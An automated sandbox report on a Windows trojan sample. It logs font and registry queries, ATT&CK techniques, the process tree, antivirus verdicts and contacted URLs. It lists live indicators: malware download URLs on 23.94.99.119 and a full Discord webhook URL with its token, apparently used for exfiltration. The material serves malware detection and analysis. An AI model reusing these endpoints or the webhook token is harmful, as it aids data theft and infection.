Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder		11
Process Injection		11
Masquerading		OS Credential Dumping1
Query Registry		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium11
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/Job1
Services File Permissions Weakness		1
Registry Run Keys / Startup Folder		1
Virtualization/Sandbox Evasion		LSASS Memory11
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Non-Standard Port		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)1
Services File Permissions Weakness		1
Disable or Modify Tools		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration12
Ingress Tool Transfer		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer4
Non-Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
Remote System Discovery		SSHKeyloggingData Transfer Size Limits15
Application Layer Protocol		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Services File Permissions Weakness		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Timestomp		DCSync12
System Information Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 798180 Sample: S3zoj9Uts0.exe Startdate: 03/02/2023 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic 2->38 40 Antivirus detection for URL or domain 2->40 42 Antivirus detection for dropped file 2->42 44 5 other signatures 2->44 8 S3zoj9Uts0.exe 19 5 2->8         started        13 discord.exe 3 2->13         started        15 discord.exe 14 3 2->15         started        process3 dnsIp4 32 23.94.99.119, 1337, 49696, 49698 AS-COLOCROSSINGUS United States 8->32 34 canary.discord.com 162.159.138.232, 443, 49697, 49701 CLOUDFLARENETUS United States 8->34 28 C:\Users\user\AppData\Roaming\...\discord.exe, PE32 8->28 dropped 46 Drops executable to a common third party application directory 8->46 17 javaw.exe 4 8->17         started        19 javaw.exe 13->19         started        36 162.159.135.232, 443, 49699 CLOUDFLARENETUS United States 15->36 22 javaw.exe 2 15->22         started        file5 signatures6 process7 dnsIp8 24 icacls.exe 1 17->24         started        30 192.168.2.1 unknown unknown 19->30 process9 process10 26 conhost.exe 24->26         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
S3zoj9Uts0.exe29%ReversingLabsWin32.Trojan.Generic
S3zoj9Uts0.exe32%VirustotalBrowse
S3zoj9Uts0.exe100%AviraHEUR/AGEN.1217604
S3zoj9Uts0.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe100%AviraHEUR/AGEN.1217604
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe29%ReversingLabsWin32.Trojan.Generic

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.0.S3zoj9Uts0.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1217604Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://www.chambersign.org10%URL Reputationsafe
https://ocsp.quovadisoffshore.com0%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/80%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://www.jiyu-kobo.co.jp/.0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://policy.camerfirma.com00%URL Reputationsafe
http://www.jiyu-kobo.co.jp/X0%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl0%URL Reputationsafe
http://bugreport.sun.com/bugreport/0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/J0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/C0%URL Reputationsafe
http://www.fontbureau.come.com0%URL Reputationsafe
http://23.94.99.11940%Avira URL Cloudsafe
http://cps.chambersign.org/cps/chambersroot.html0%URL Reputationsafe
https://canary.discord.com/api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS0%Avira URL Cloudsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl0%URL Reputationsafe
http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
http://www.founder.com.cn/cn20%URL Reputationsafe
http://www.quovadis.bm00%URL Reputationsafe
http://www.jiyu-kobo.co.jp/h0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/d0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/C0%URL Reputationsafe
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/.0%URL Reputationsafe
http://www.ascendercorp.com/typedesigners.html70%Avira URL Cloudsafe
http://www.tiro.com0%URL Reputationsafe
http://23.94.99.119/discord.jar100%Avira URL Cloudmalware
http://policy.camerfirma.comS0%Avira URL Cloudsafe
http://www.sakkal.comin0%Avira URL Cloudsafe
http://23.94.99.119/discord.exe100%Avira URL Cloudmalware
http://www.sakkal.comd0%Avira URL Cloudsafe
http://cps.chambersign.org/cps/chambersroot.html#0%Avira URL Cloudsafe
http://www.certplus.com/CRL/class2.crlk3G0%Avira URL Cloudsafe
http://www.goodfont.co.kr0%URL Reputationsafe
http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
https://canary.discord.com/api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwX0%Avira URL Cloudsafe
http://www.typography.netD0%URL Reputationsafe
http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
http://en.wikipedia.Xs0%Avira URL Cloudsafe
http://fontfabrik.com0%URL Reputationsafe
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
https://ocsp.quovadisoffshore.com00%URL Reputationsafe
http://www.sakkal.com0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/X0%URL Reputationsafe
http://www.chambersign.org0%URL Reputationsafe
http://crl.xrampsecurity.com/XGCA.crl0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/o0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
http://crl.securetrust.com/STCA.crl3N?0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.fontbureau.comce0%URL Reputationsafe
http://www.fontbureau.comod0%Avira URL Cloudsafe
http://canary.discord.com0%Avira URL Cloudsafe
http://cps.chambersign.org/cps/chambersroot.htmlk0%Avira URL Cloudsafe
http://23.94.99.1190%Avira URL Cloudsafe
https://canary.discord.com40%Avira URL Cloudsafe
http://www.zhongyicts.com.cn7r#0%Avira URL Cloudsafe
http://23.94.99.119D80%Avira URL Cloudsafe
https://canary.discord.com0%Avira URL Cloudsafe
http://crl.securetrust.com/STCA.crl3#?0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
canary.discord.com
162.159.138.232
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://canary.discord.com/api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zSfalse
    • Avira URL Cloud: safe
    		unknown
    http://23.94.99.119/discord.exetrue
    • Avira URL Cloud: malware
    		unknown
    http://23.94.99.119/discord.jartrue
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://crl.chambersign.org/chambersroot.crl0javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
